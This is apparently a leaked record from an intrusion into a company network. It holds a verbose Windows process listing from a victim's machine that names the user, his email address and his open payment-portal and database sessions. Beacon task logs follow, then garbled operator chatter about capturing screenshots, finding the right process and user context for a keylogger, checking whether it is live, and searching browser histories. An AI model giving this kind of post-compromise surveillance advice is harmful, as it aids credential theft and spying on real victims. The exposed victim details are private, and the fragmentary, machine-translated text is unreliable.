Image Name PID Session Name Session# Mem Usage Status User Name CPU Time Window Title ========================= ======== ================ =========== ============ =============== ================================================== ============ ======================================================================== System Idle Process 0 Services 0 8 K Unknown NT AUTHORITY\SYSTEM 2195:13:43 N/A System 4 Services 0 4,980 K Unknown NT AUTHORITY\SYSTEM 32:36:26 N/A Secure System 88 Services 0 40,516 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A Registry 152 Services 0 78,556 K Unknown NT AUTHORITY\SYSTEM 0:00:13 N/A smss.exe 740 Services 0 1,032 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A csrss.exe 1144 Services 0 3,304 K Unknown NT AUTHORITY\SYSTEM 0:01:06 N/A wininit.exe 1236 Services 0 2,900 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A csrss.exe 1244 Console 1 19,380 K Running NT AUTHORITY\SYSTEM 0:04:58 N/A services.exe 1308 Services 0 13,988 K Unknown NT AUTHORITY\SYSTEM 0:03:53 N/A LsaIso.exe 1320 Services 0 2,100 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A lsass.exe 1336 Services 0 26,320 K Unknown NT AUTHORITY\SYSTEM 0:20:34 N/A svchost.exe 1460 Services 0 2,332 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A svchost.exe 1484 Services 0 37,304 K Unknown NT AUTHORITY\SYSTEM 0:03:38 N/A WUDFHost.exe 1508 Services 0 2,336 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:00 N/A fontdrvhost.exe 1536 Services 0 1,548 K Unknown Font Driver Host\UMFD-0 0:00:07 N/A svchost.exe 1604 Services 0 21,892 K Unknown NT AUTHORITY\NETWORK SERVICE 0:07:21 N/A svchost.exe 1652 Services 0 8,252 K Unknown NT AUTHORITY\SYSTEM 0:01:47 N/A winlogon.exe 1748 Console 1 18,156 K Unknown NT AUTHORITY\SYSTEM 0:01:11 N/A fontdrvhost.exe 1812 Console 1 8,048 K Unknown Font Driver Host\UMFD-1 0:03:45 N/A svchost.exe 1936 Services 0 18,244 K Unknown NT AUTHORITY\NETWORK SERVICE 0:04:46 N/A svchost.exe 1952 Services 0 3,888 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:00 N/A svchost.exe 1964 Services 0 6,180 K Unknown NT 
AUTHORITY\LOCAL SERVICE 0:00:03 N/A dwm.exe 1992 Console 1 116,224 K Running Window Manager\DWM-1 1:22:41 DWM Notification Window svchost.exe 2000 Services 0 2,292 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A svchost.exe 1096 Services 0 4,480 K Unknown NT AUTHORITY\LOCAL SERVICE 0:02:37 N/A svchost.exe 1596 Services 0 4,944 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A svchost.exe 1648 Services 0 6,040 K Unknown NT AUTHORITY/LOCAL SERVICE 0:00:00 N/A svchost.exe 876 Services 0 7,480 K Unknown NT AUTHORITY/NETWORK SERVICE 0:14:02 N/A svchost.exe 2124 Services 0 2,872 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A svchost.exe 2300 Services 0 22,864 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:20 N/A svchost.exe 2352 Services 0 21,184 K Unknown NT AUTHORITY\LOCAL SERVICE 0:02:03 N/A svchost.exe 2424 Services 0 8,128 K Unknown NT AUTHORITY/NETWORK SERVICE 0:00:57 N/A NVDisplay.Container.exe 2452 Services 0 7,964 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A svchost.exe 2472 Services 0 7,292 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A svchost.exe 2600 Services 0 7,420 K Unknown NT AUTHORITY\LOCAL SERVICE 0:01:50 N/A svchost.exe 2724 Services 0 5,660 K Unknown NT AUTHORITY\LOCAL SERVICE 0:01:08 N/A svchost.exe 2792 Services 0 21,376 K Unknown NT AUTHORITY\SYSTEM 0:06:22 N/A svchost.exe 2836 Services 0 7,808 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A svchost.exe 2844 Services 0 7,832 K Unknown NT AUTHORITY\SYSTEM 0:14:02 N/A svchost.exe 2856 Services 0 2,872 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A svchost.exe 2864 Services 0 5,188 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:00 N/A svchost.exe 2872 Services 0 11,080 K Unknown NT AUTHORITY\SYSTEM 0:00:18 N/A Memory Compression 3064 Services 0 430,432 K Unknown NT AUTHORITY\SYSTEM 0:05:03 N/A svchost.exe 2536 Services 0 6,624 K Unknown NT AUTHORITY\SYSTEM 0:00:02 N/A svchost.exe 3104 Services 0 5,832 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A svchost.exe 3140 Services 0 6,612 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A svchost.exe 3148 Services 0 
6,960 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:20 N/A svchost.exe 3340 Services 0 5,788 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A svchost.exe 3608 Services 0 3,948 K Unknown NT AUTHORITY/NETWORK SERVICE 0:00:03 N/A spaceman.exe 3640 Services 0 716 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A svchost.exe 3712 Services 0 7,372 K Unknown NT AUTHORITY\SYSTEM 0:00:13 N/A svchost.exe 3764 Services 0 4,756 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A svchost.exe 3988 Services 0 11,608 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:11 N/A svchost.exe 4084 Services 0 19,856 K Unknown NT AUTHORITY\SYSTEM 0:01:15 N/A svchost.exe 3204 Services 0 4,208 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:00 N/A svchost.exe 3136 Services 0 3,100 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:00 N/A svchost.exe 8 Services 0 3,436 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A svchost.exe 4172 Services 0 6,224 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A spoolsv.exe 4268 Services 0 28,488 K Unknown NT AUTHORITY\SYSTEM 0:00:25 N/A vmms.exe 4640 Services 0 14,652 K Unknown NT AUTHORITY\SYSTEM 0:00:02 N/A BASupSrvcUpdater.exe 4648 Services 0 12,480 K Unknown NT AUTHORITY\SYSTEM 0:01:14 N/A armsvc.exe 4656 Services 0 2,852 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A VmsWebGateway.exe 4664 Services 0 47,684 K Unknown NT AUTHORITY\SYSTEM 0:23:36 N/A 3CXWMRemoteControlSvc.exe 4672 Services 0 2,972 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A svchost.exe 4680 Services 0 7,236 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:02 N/A svchost.exe 4688 Services 0 2,956 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:00 N/A svchost.exe 4704 Services 0 33,592 K Unknown NT AUTHORITY\SYSTEM 0:01:15 N/A BASupSrvc.exe 4720 Services 0 23,504 K Unknown NT AUTHORITY\SYSTEM 0:07:03 N/A DymoPnpService.exe 4732 Services 0 4,460 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A svchost.exe 4740 Services 0 34,384 K Unknown NT AUTHORITY\LOCAL SERVICE 0:04:11 N/A AdobeUpdateService.exe 4748 Services 0 3,516 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A PcmService.exe 4756 
Services 0 10,676 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A svchost.exe 4772 Services 0 3,248 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A SDFSSvc.exe 4764 Services 0 9,532 K Unknown NT AUTHORITY\SYSTEM 0:01:11 N/A svchost.exe 4780 Services 0 1,984 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:00 N/A vmware-authd.exe 4796 Services 0 6,124 K Unknown NT AUTHORITY\SYSTEM 0:13:46 N/A EPUpdateService.exe 4804 Services 0 9,680 K Unknown NT AUTHORITY\SYSTEM 0:01:10 N/A sqlwriter.exe 4812 Services 0 3,068 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A SDUpdSvc.exe 4820 Services 0 14,560 K Unknown NT AUTHORITY\SYSTEM 0:00:50 N/A RtkAudUService64.exe 4828 Services 0 3,632 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A IpOverUsbSvc.exe 4836 Services 0 4,736 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A svchost.exe 4844 Services 0 36,140 K Unknown NT AUTHORITY/NETWORK SERVICE 0:00:28 N/A svchost.exe 4860 Services 0 13,024 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A bdredline.exe 4868 Services 0 10,680 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A svchost.exe 4876 Services 0 7,516 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:14 N/A NCentralLauncherService.e 4896 Services 0 11,280 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A svchost.exe 4904 Services 0 3,872 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A RedGate.Client.Service.ex 4912 Services 0 27,480 K Unknown NT AUTHORITY\SYSTEM 0:00:05 N/A EPIntegrationService.exe 4920 Services 0 14,488 K Unknown NT AUTHORITY\SYSTEM 0:01:31 N/A vmnetdhcp.exe 4936 Services 0 2,716 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A mDNSResponder.exe 4944 Services 0 4,056 K Unknown NT AUTHORITY\SYSTEM 0:00:04 N/A svchost.exe 4952 Services 0 2,768 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A AGMService.exe 4960 Services 0 9,396 K Unknown NT AUTHORITY\SYSTEM 0:00:02 N/A agent.exe 4972 Services 0 244,776 K Unknown NT AUTHORITY\SYSTEM 0:13:16 N/A wgsslvpnsrc.exe 4980 Services 0 2,796 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A EPProtectedService.exe 5008 Services 0 6,552 K Unknown NT 
AUTHORITY\SYSTEM 0:00:12 N/A vmware-usbarbitrator64.ex 5036 Services 0 3,968 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A EPSecurityService.exe 5048 Services 0 332,708 K Unknown NT AUTHORITY\SYSTEM 3:07:02 N/A vmnat.exe 5124 Services 0 3,480 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A AGSService.exe 5144 Services 0 8,696 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A CptService.exe 5156 Services 0 2,948 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A TeamViewer_Service.exe 5384 Services 0 5,952 K Unknown NT AUTHORITY\SYSTEM 0:00:04 N/A svchost.exe 5392 Services 0 3,520 K Unknown NT AUTHORITY/NETWORK SERVICE 0:00:03 N/A svchost.exe 5508 Services 0 5,976 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A svchost.exe 5540 Services 0 3,440 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:00 N/A svchost.exe 5580 Services 0 5,104 K Unknown NT AUTHORITY\SYSTEM 0:00:03 N/A SDWSCSvc.exe 5612 Services 0 5,748 K Unknown NT AUTHORITY\SYSTEM 0:01:39 N/A svchost.exe 5808 Services 0 5,472 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A dasHost.exe 5932 Services 0 7,188 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:01 N/A svchost.exe 6804 Services 0 4,624 K Unknown NT AUTHORITY/NETWORK SERVICE 0:00:01 N/A GWCtlSrv.exe 7056 Services 0 129,840 K Unknown NT AUTHORITY\SYSTEM 1:04:01 N/A unsecapp.exe 7416 Services 0 4,216 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A dasHost.exe 7920 Services 0 1,780 K Unknown NT AUTHORITY/NETWORK SERVICE 0:00:00 N/A svchost.exe 8480 Services 0 4,196 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:00 N/A vmcompute.exe 8552 Services 0 2,560 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A svchost.exe 9192 Services 0 4,268 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A svchost.exe 8084 Services 0 3,156 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A dllhost.exe 9356 Services 0 6,404 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A WmiPrvSE.exe 9456 Services 0 44,636 K Unknown NT AUTHORITY\SYSTEM 0:17:58 N/A svchost.exe 11224 Services 0 4,700 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A NableSixtyFourBitManager. 
9308 Services 0 35,324 K Unknown NT AUTHORITY\SYSTEM 0:18:15 N/A conhost.exe 9280 Services 0 3,812 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A NableReactiveManagement.e 8436 Services 0 15,752 K Unknown NT AUTHORITY\SYSTEM 0:00:02 N/A conhost.exe 8432 Services 0 3,812 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A svchost.exe 10260 Services 0 13,796 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A svchost.exe 11552 Services 0 8,116 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:00 N/A SolarWinds.MSP.CacheServi 10272 Services 0 24,052 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:11 N/A SolarWinds.MSP.RpcServerS 12376 Services 0 17,752 K Unknown NT AUTHORITY\SYSTEM 0:00:12 N/A NVDisplay.Container.exe 12824 Console 1 23,560 K Running NT AUTHORITY\SYSTEM 0:00:12 NvSvc svchost.exe 13072 Services 0 5,272 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:47 N/A svchost.exe 3972 Services 0 9,556 K Unknown NT AUTHORITY\SYSTEM 0:00:03 N/A cmd.exe 10692 Services 0 3,472 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A conhost.exe 3472 Services 0 4,636 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A powershell.exe 9392 Services 0 8,312 K Unknown NT AUTHORITY\SYSTEM 0:00:06 N/A ALEService.exe 6424 Services 0 278,392 K Unknown WATERWAY\Administrator 25:54:25 N/A SgrmBroker.exe 9920 Services 0 6,524 K Unknown NT AUTHORITY\SYSTEM 0:00:24 N/A SolarWinds.MSP.PME.Agent. 
10480 Services 0 6,140 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A AgentMaint.exe 8472 Services 0 12,552 K Unknown NT AUTHORITY\SYSTEM 0:00:02 N/A NableAVDBridge.exe 1080 Services 0 20,836 K Unknown NT AUTHORITY\SYSTEM 0:00:12 N/A conhost.exe 3952 Services 0 8,588 K Unknown NT AUTHORITY\SYSTEM 0:00:03 N/A svchost.exe 12600 Services 0 6,264 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A svchost.exe 5348 Services 0 8,256 K Unknown NT AUTHORITY\SYSTEM 0:00:28 N/A svchost.exe 13084 Services 0 14,636 K Unknown NT AUTHORITY\SYSTEM 0:00:04 N/A WmiPrvSE.exe 11176 Services 0 18,112 K Unknown NT AUTHORITY\SYSTEM 0:12:50 N/A svchost.exe 12772 Services 0 12,884 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:02 N/A EPConsole.exe 10036 Console 1 980 K Running WATERWAY\mharper 0:01:24 DeviceScanInvisibleDialog sihost.exe 8052 Console 1 26,364 K Running WATERWAY\mharper 0:00:59 N/A svchost.exe 13196 Console 1 34,052 K Unknown WATERWAY\mharper 0:02:50 N/A svchost.exe 5636 Console 1 28,584 K Running WATERWAY\mharper 0:00:15 N/A Windows Push Notifications Platform svchost.exe 3496 Services 0 20,100 K Unknown NT AUTHORITY\SYSTEM 0:02:27 N/A svchost.exe 12876 Services 0 5,884 K Unknown NT AUTHORITY\SYSTEM 0:00:02 N/A explorer.exe 7964 Console 1 161,740 K Running WATERWAY\mharper 0:09:58 N/A svchost.exe 12656 Console 1 23,688 K Running WATERWAY\mharper 0:00:11 N/A StartMenuExperienceHost.e 12852 Console 1 71,244 K Running WATERWAY\mharper 0:00:06 Start RuntimeBroker.exe 11180 Console 1 10,820 K Unknown WATERWAY\mharper 0:00:01 N/A PowerToys.exe 3224 Console 1 16,996 K Running WATERWAY\mharper 0:02:35 N/A SearchUI.exe 1740 Console 1 191,720 K Running WATERWAY\mharper 0:01:01 N/A RuntimeBroker.exe 9124 Console 1 33,680 K Running WATERWAY\mharper 0:00:18 N/A SecurityHealthSystray.exe 13596 Console 1 8,472 K Running WATERWAY\mharper 0:00:07 N/A SecurityHealthService.exe 13616 Services 0 12,748 K Unknown NT AUTHORITY\SYSTEM 0:01:14 N/A svchost.exe 14072 Services 0 9,028 K Unknown NT AUTHORITY\SYSTEM 
0:00:00 N/A SetPoint.exe 1872 Console 1 10,252 K Running WATERWAY\mharper 0:00:07 N/A KHALMNPR.exe 13780 Console 1 9,236 K Running WATERWAY\mharper 0:00:16 KHALHIDC_MainWindow RtkAudUService64.exe 14060 Console 1 6,916 K Running WATERWAY\mharper 0:00:00 RealtekAudioBackgroundProcessClass svchost.exe 8320 Services 0 7,180 K Unknown NT AUTHORITY\SYSTEM 0:00:02 N/A RuntimeBroker.exe 14364 Console 1 19,484 K Unknown WATERWAY\mharper 0:00:45 N/A LogiOptions.exe 14388 Console 1 9,392 K Running WATERWAY\mharper 0:01:37 LOGI_RAWINPUT_WND LogiOptionsMgr.exe 14516 Console 1 29,380 K Running WATERWAY\mharper 0:09:59 LDEVICEMGR_WINDOW_{49DCDDA1-BF03-46BC-B469-59A0616325A2} LogiOverlay.exe 14528 Console 1 61,356 K Running WATERWAY\mharper 0:00:44 WISPTIS StreamDeck.exe 14624 Console 1 47,372 K Running WATERWAY\mharper 2:09:20 NVOpenGLPbuffer OneDrive.exe 14836 Console 1 38,668 K Running WATERWAY\mharper 0:00:27 DDE Server Window flux.exe 15676 Console 1 19,472 K Running WATERWAY\mharper 0:00:39 f.lux: Softer during the day, Warm before bed CCleaner64.exe 15592 Console 1 45,016 K Running WATERWAY\mharper 0:01:12 N/A GlassWire.exe 15532 Console 1 65,324 K Running WATERWAY\mharper 0:02:22 GlassWire svchost.exe 15548 Services 0 16,388 K Unknown NT AUTHORITY\SYSTEM 0:00:05 N/A QtWebEngineProcess.exe 15568 Console 1 8,100 K Unknown WATERWAY\mharper 0:00:00 N/A svchost.exe 16508 Services 0 6,152 K Unknown NT AUTHORITY\LOCAL SERVICE 0:01:00 N/A com.barraider.spotify.exe 16832 Console 1 10,068 K Unknown WATERWAY\mharper 0:00:10 N/A conhost.exe 18784 Console 1 4,088 K Unknown WATERWAY\mharper 0:00:00 N/A com.barraider.streamcount 18836 Console 1 37,360 K Running WATERWAY\mharper 0:24:35 .NET-BroadcastEventWindow.4.0.0.0.37a9c05.0 QtWebEngineProcess.exe 18844 Console 1 12,188 K Unknown WATERWAY\mharper 0:00:00 N/A conhost.exe 18856 Console 1 4,104 K Unknown WATERWAY\mharper 0:00:00 N/A cpu.exe 18984 Console 1 4,780 K Unknown WATERWAY\mharper 0:00:25 N/A conhost.exe 18992 Console 1 4,100 K 
Unknown WATERWAY\mharper 0:00:00 N/A com.nicollasr.streamdeckv 19016 Console 1 14,940 K Running WATERWAY\mharper 0:00:07 OleMainThreadWndName conhost.exe 19048 Console 1 3,984 K Unknown WATERWAY\mharper 0:00:00 N/A twitchstudiostreamdeck.ex 19056 Console 1 3,624 K Unknown WATERWAY\mharper 0:00:00 N/A conhost.exe 19072 Console 1 3,988 K Unknown WATERWAY\mharper 0:00:00 N/A ColorPicker.exe 20096 Console 1 9,928 K Running WATERWAY\mharper 0:00:05 MediaContextNotificationWindow PowerLauncher.exe 20412 Console 1 131,324 K Running WATERWAY\mharper 0:02:46 Hidden Window CCXProcess.exe 19820 Console 1 2,372 K Unknown WATERWAY\mharper 0:00:00 N/A node.exe 19840 Console 1 13,504 K Unknown WATERWAY\mharper 0:00:21 N/A conhost.exe 19876 Console 1 4,084 K Unknown WATERWAY\mharper 0:00:00 N/A Screenpresso.exe 19996 Console 1 25,832 K Running WATERWAY\mharper 0:00:11 N/A AdobeIPCBroker.exe 20912 Console 1 6,108 K Running WATERWAY\mharper 0:00:02 N/A NCentralRRDLdr.exe 14720 Console 1 7,892 K Running WATERWAY\mharper 0:00:06 N/A 3CXWin8Phone.exe 21632 Console 1 123,544 K Running WATERWAY\mharper 0:44:55 3CX - 3592 Mark Harper BASupSrvcCnfg.exe 21872 Console 1 12,808 K Running WATERWAY\mharper 0:11:53 IncomingVoIPCallTrayForm acrotray.exe 13696 Console 1 16,756 K Running WATERWAY\mharper 0:00:00 AcrobatTrayIcon WScheduler.exe 23000 Console 1 5,364 K Running WATERWAY\mharper 0:01:44 WScheduler SDTray.exe 23544 Console 1 17,668 K Running WATERWAY\mharper 0:01:15 Spybot - Search & Destroy 2 ShellExperienceHost.exe 17392 Console 1 56,400 K Running WATERWAY\mharper 0:00:12 New notification RuntimeBroker.exe 20748 Console 1 19,832 K Running WATERWAY\mharper 0:00:00 N/A GWIdlMon.exe 25244 Console 1 7,004 K Running WATERWAY\mharper 0:00:16 GlassWireIdleMonitorWn conhost.exe 25252 Console 1 3,992 K Unknown WATERWAY\mharper 0:00:00 N/A svchost.exe 25592 Console 1 13,172 K Unknown WATERWAY\mharper 0:00:00 N/A WinStore.App.exe 7836 Console 1 688 K Running WATERWAY\mharper 0:00:01 N/A 
ApplicationFrameHost.exe 25828 Console 1 23,108 K Running WATERWAY\mharper 0:00:02 Calculator RuntimeBroker.exe 24008 Console 1 14,084 K Running WATERWAY\mharper 0:00:01 OleMainThreadWndName AcrobatNotificationClient 25972 Console 1 6,372 K Running WATERWAY\mharper 0:00:00 N/A AdobeNotificationClient.e 25996 Console 1 14,900 K Running WATERWAY\mharper 0:00:00 N/A AcrobatNotificationClient 26052 Console 1 6,404 K Running WATERWAY\mharper 0:00:00 N/A RuntimeBroker.exe 16240 Console 1 14,568 K Unknown WATERWAY\mharper 0:00:00 N/A RuntimeBroker.exe 25876 Console 1 14,396 K Unknown WATERWAY\mharper 0:00:00 N/A RuntimeBroker.exe 25888 Console 1 11,688 K Unknown WATERWAY\mharper 0:00:00 N/A CompPkgSrv.exe 23576 Console 1 6,024 K Unknown WATERWAY\mharper 0:00:00 N/A SystemSettings.exe 22688 Console 1 644 K Running WATERWAY\mharper 0:00:00:00 Settings svchost.exe 21296 Services 0 5,900 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A taskhostw.exe 26116 Console 1 15,672 K Running WATERWAY\mharper 0:00:00 Task Host Window WindowsInternal.composabl 27044 Console 1 41,168 K Running WATERWAY\mharper 0:00:14 Microsoft Text Input Application rundll32.exe 26128 Console 1 5,896 K Running WATERWAY\mharper 0:00:00 OleMainThreadWndName svchost.exe 25704 Services 0 4,896 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A notepad.exe 2892 Console 1 10,996 K Running WATERWAY\mharper 0:00:08 *Untitled - Notepad SettingSyncHost.exe 15248 Console 1 5,636 K Running WATERWAY\mharper 0:00:00 N/A svchost.exe 23560 Console 1 4,408 K Unknown WATERWAY\mharper 0:00:00 N/A svchost.exe 6036 Services 0 5,840 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:30 N/A NCentralRDViewer.exe 2440 Console 1 16,612 K Running WATERWAY\mharper 0:01:03 SolarWinds Take Control svchost.exe 17712 Services 0 8,284 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A SystemSettingsBroker.exe 10444 Console 1 8,000 K Unknown WATERWAY\mharper 0:00:00 N/A Microsoft.Photos.exe 29200 Console 1 68,756 K Running WATERWAY\mharper 0:00:41 OleMainThreadWndName 
RuntimeBroker.exe 28796 Console 1 28,488 K Running WATERWAY\mharper 0:00:57 N/A Calculator.exe 21148 Console 1 500 K Running WATERWAY\mharper 0:00:00 Calculator Video.UI.exe 30660 Console 1 12,768 K Running WATERWAY\mharper 0:00:00 N/A RuntimeBroker.exe 24116 Console 1 7,544 K Unknown WATERWAY\mharper 0:00:00 N/A ctfmon.exe 26676 Console 1 17,252 K Running WATERWAY\mharper 0:00:11 N/A MailStoreHome.exe 8108 Console 1 432,560 K Running WATERWAY\mharper 7:17:28 Progress View Ssms.exe 19396 Console 1,297,696 K Running WATERWAY\mharper 0:58:09 SQLQuery2.sql - Unit 43.Gilbarco (sa (60))* - Microsoft SQL Server Manag unsecapp.exe 31732 Console 1 13,220 K Running WATERWAY\mharper 0:01:05 OleMainThreadWndName firefox.exe 5428 Console 1 429,628 K Running WATERWAY\mharper 0:03:14 Authorize.NET - Login - Merchant Interface - Mozilla Firefox firefox.exe 25284 Console 1 83,832 K Running WATERWAY\mharper 0:00:03 N/A firefox.exe 27856 Console 1 71,808 K Running WATERWAY\mharper 0:00:01 OleMainThreadWndName firefox.exe 9332 Console 1 423,712 K Running WATERWAY\mharper 0:08:55 OleMainThreadWndName nplastpass.exe 16856 Console 1 9,912 K Not Responding WATERWAY\mharper 0:00:00 OleMainThreadWndName conhost.exe 20348 Console 1 6,384 K Unknown WATERWAY\mharper 0:00:00 N/A firefox.exe 23236 Console 1 130,108 K Running WATERWAY\mharper 0:00:05 OleMainThreadWndName firefox.exe 24704 Console 1 144,296 K Running WATERWAY\mharper 0:00:13 OleMainThreadWndName firefox.exe 6720 Console 1 40,112 K Not Responding WATERWAY\mharper 0:00:01 OleMainThreadWndName firefox.exe 2592 Console 1 34,500 K Not Responding WATERWAY\mharper 0:00:00 OleMainThreadWndName YourPhone.exe 19940 Console 1 28,036 K Running WATERWAY\mharper 0:00:00 N/A RuntimeBroker.exe 21212 Console 1 11,620 K Unknown WATERWAY\mharper 0:00:00 N/A taskhostw.exe 22120 Console 1 19,008 K Running WATERWAY\mharper 0:00:00 Task Host Window mstsc.exe 28548 Console 1 15,928 K Unknown NT AUTHORITY\SYSTEM 0:00:06 N/A OfficeClickToRun.exe 25400 
Services 0 72,136 K Unknown NT AUTHORITY\SYSTEM 0:00:17 N/A AppVShNotify.exe 18780 Services 0 8,668 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A AppVShNotify.exe 7548 Console 1 9,424 K Unknown WATERWAY\mharper 0:00:00 N/A SearchIndexer.exe 16388 Services 0 171,936 K Unknown NT AUTHORITY\SYSTEM 0:01:30 N/A UserInterface.exe 22152 Console 1 34,048 K Running WATERWAY\mharper 0:00:00 Email Change Request - v2.0.0.12 mstsc.exe 18104 Console 1 8,880 K Unknown WATERWAY\mharper 0:00:15 N/A WmiPrvSE.exe 20708 Services 0 14,132 K Unknown NT AUTHORITY\NETWORK SERVICE 0:00:00 N/A svchost.exe 18532 Services 0 7,532 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A svchost.exe 25384 Services 0 21,744 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A TabTip.exe 8460 Console 1 17,892 K Running WATERWAY\mharper 0:00:00 G svchost.exe 22944 Services 0 9,132 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:00 N/A OUTLOOK.EXE 31768 Console 1 286,900 K Running WATERWAY\mharper 0:00:49 Orders - mharper@waterway.com - Outlook SearchProtocolHost.exe 26768 Console 1 8,984 K Running WATERWAY\mharper 0:00:50 HardwareMonitorWindow powershell.exe 23332 Services 0 74,120 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A conhost.exe 26448 Services 0 12,088 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A powershell.exe 30680 Services 0 58,904 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A conhost.exe 25292 Services 0 11,508 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A SearchFilterHost.exe 17528 Services 0 28,072 K Unknown NT AUTHORITY\SYSTEM 0:00:13 N/A svchost.exe 27460 Services 0 13,416 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A SDUpdate.exe 15416 Services 0 20,268 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A svchost.exe 29440 Services 0 8,720 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A cmd.exe 27000 Console 1 6,088 K Running NT AUTHORITY\SYSTEM 0:00:00 N/A conhost.exe 13852 Console 1 13,148 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A tasklist.exe 18052 Console 1 11,924 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A ``was just now''. 
Chrome isn't on the process sheet, I'll close my browser for 24 hours.
Tasked beaconed tasklist /
I'll double-check from the context? I tried it
Tasked beacon to take screenshot [+] host called home, sent: 199779 bytes [-] screenshot from desktop 0 is empty
and give a screenshot of his desktop just every time I do it randomly, and maybe there is a best practices on I wrote when I looked so you weighed the same keylog?
preferably not falling off)
and the process any?
user context
I had a keylogger in `Rackspace`
can you find anything here about the keylogger - on which processes and under which user to hang it correctly?
i can't remember in whose work) the one in mine is in fact in another case (if you suddenly thought about mine) i saw exactly in someone's active keylogger in other kobs
have you checked? keylogger session hangs
why then i did not put keylogger (in the keylogger empty? it has already appeared in the dialogue)
i remember if you put the keylogger? scared me, however)
i went to the Watchguard and there all is normal
all is normal as i understand it on the site and not monitor their network
`Waterway Customer Service`
sender who? just a general report came for all time-date
4-read
do not read?
I did not understand the joke about the russians in the mail
the links in the boxes met?
all collected browsers passed and nowhere is `infosight.hpe.com or hpe.com`
I did not find myself in the removed, I do not know how the colleague does not have a link in browsers?
seems not. when the client creates folders in the programdata.
I did not find any
infosight.hpe.com or hpe.com link above, look in browser histories
Download the latest version of the HPE Nimble Storage Windows Toolkit (NWT) to install on your Windows host or Windows VM. Log into HPE InfoSight (https://infosight.hpe.com/). If you do not have a password, click New user? Enroll now. Click Resources > Software Downloads. In the Integration Kits pane, click Windows Toolkit.
